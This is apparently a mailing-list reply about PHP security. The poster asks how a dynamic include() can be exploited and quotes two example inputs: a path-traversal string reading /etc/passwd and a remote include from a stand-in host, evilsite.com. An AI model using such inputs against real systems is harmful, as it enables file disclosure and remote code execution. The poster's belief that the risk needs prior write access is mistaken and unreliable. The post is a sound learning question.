Larry,

Thank you for responding.

$untrusted_var = '../../../../../../../etc/passwd';
include($untrusted_var);

Or in later versions of PHP, I *think* the following may even work:

$untrusted_var = 'http://evilsite.com/pub/evil.php';
include($untrusted_var);

I'm still not sure I see the danger. By which I'm not saying that I deny there is danger, just that I don't see this.

In both cases cited above, the malicious user has to write the code into my script that says to include($untrusted_var). And, again, it seems to me that if the malicious user has made it far enough to gain enough access to be able to do that, the damage is already done. They already have full access and full write capability, and could do any number of crazy things.

I understand that I am being warned of a potential security risk, and I hope to come to understand it. But can someone show me more explicitly how someone could exploit a dynamic include() function with simple access through forms? And, can that access be exploited even when fairly common restrictions on form data is implemented (such as no tags and such)?

--
Dave M G